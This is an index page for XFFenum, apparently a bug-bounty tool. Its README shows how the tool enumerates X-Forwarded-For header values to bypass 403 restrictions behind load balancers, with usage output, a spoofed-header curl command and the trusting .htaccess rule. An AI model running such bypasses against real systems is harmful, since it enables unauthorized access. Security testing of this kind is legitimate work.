Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/vavkamil/XFFenum
X-Forwarded-For [403 forbidden] enumeration
https://github.com/vavkamil/XFFenum
Last synced: 5 days ago
JSON representation
X-Forwarded-For [403 forbidden] enumeration
- Host: GitHub
- URL: https://github.com/vavkamil/XFFenum
- Owner: vavkamil
- Created: 2019-07-25T17:48:20.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2024-05-03T19:47:14.000Z (6 months ago)
- Last Synced: 2024-08-01T10:17:24.180Z (3 months ago)
- Language: Python
- Homepage:
- Size: 5.86 KB
- Stars: 87
- Watchers: 3
- Forks: 27
- Open Issues: 2
-
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
Awesome Lists containing this project
- awesome-bugbounty-tools - XFFenum - X-Forwarded-For [403 forbidden] enumeration (Miscellaneous / Uncategorized)
README
# XFFenum
A simple tool to bypass 403 forbidden end-points behind load balancers (Cloudflare) based on X-Forwarded-For header
Based on the [enumXFF](https://github.com/infosec-au/enumXFF) by @infosec_au
### Example
```
vavkamil@localhost:~/XFFenum$ python3 xffenum.py -u https://xss.vavkamil.cz/xff -i 192.168.0.0/16
__ _______ _____
\ \/ / ___| ___|__ _ __ _ _ _ __ ___
\ /| |_ | |_ / _ \ '_ \| | | | '_ ` _ \
/ \| _| | _| __/ | | | |_| | | | | | |
/_/\_\_| |_| \___|_| |_|\__,_|_| |_| |_|
X-Forwarded-For [403 forbidden] enumeration[i] Using URL: https://xss.vavkamil.cz/xff
[i] Using IP range: 192.168.0.0/16
[i] IP addresses in range: 65536
[i] Iterations required: 13108673it [00:34, 21.69it/s]
[!] Access granted with 192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41
[!] curl https://xss.vavkamil.cz/xff -H "X-Forwarded-For: 192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41"
```#### Proof of Concept
```
vavkamil@localhost:~$ curl -i https://xss.vavkamil.cz/xff
HTTP/2 403
date: Wed, 07 Aug 2019 20:02:41 GMT
content-type: text/html; charset=iso-8859-1
set-cookie: __cfduid=d77da0ad10e7a360cce4a28311784c12d1565208161; expires=Thu, 06-Aug-20 20:02:41 GMT; path=/; domain=.vavkamil.cz; HttpOnly; Secure
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
server: cloudflare
cf-ray: 502bd9832d69c2db-FRA403 Forbidden
Forbidden
You don't have permission to access /xff
on this server.
Apache/2.4.29 (Ubuntu) Server at xss.vavkamil.cz Port 80```
##### .htaccess
```
Order Deny,Allow
Deny from all
SetEnvIf X-Forwarded-For "192.168.13.37" AllowAccess
Allow from env=AllowAccess
```### Usage
```
vavkamil@localhost:~/XFFenum$ python3 xffenum.py -h
__ _______ _____
\ \/ / ___| ___|__ _ __ _ _ _ __ ___
\ /| |_ | |_ / _ \ '_ \| | | | '_ ` _ \
/ \| _| | _| __/ | | | |_| | | | | | |
/_/\_\_| |_| \___|_| |_|\__,_|_| |_| |_|
X-Forwarded-For [403 forbidden] enumerationusage: xffenum.py [-h] -u URL -i IP_RANGE [-t THREADS] [--no-verify-ssl]
X-Forwarded-For [403 forbidden] enumeration
optional arguments:
-h, --help show this help message and exit
-u URL Forbidden URL patch to scan
-i IP_RANGE Signe IP or range to use
-t THREADS number of threads (default: 5)
--no-verify-ssl Ignore any and all SSL errors.Have a nice day :)
```## References
https://shubs.io/enumerating-ips-in-x-forwarded-headers-to-bypass-403-restrictions/
https://blog.ircmaxell.com/2012/11/anatomy-of-attack-how-i-hacked.html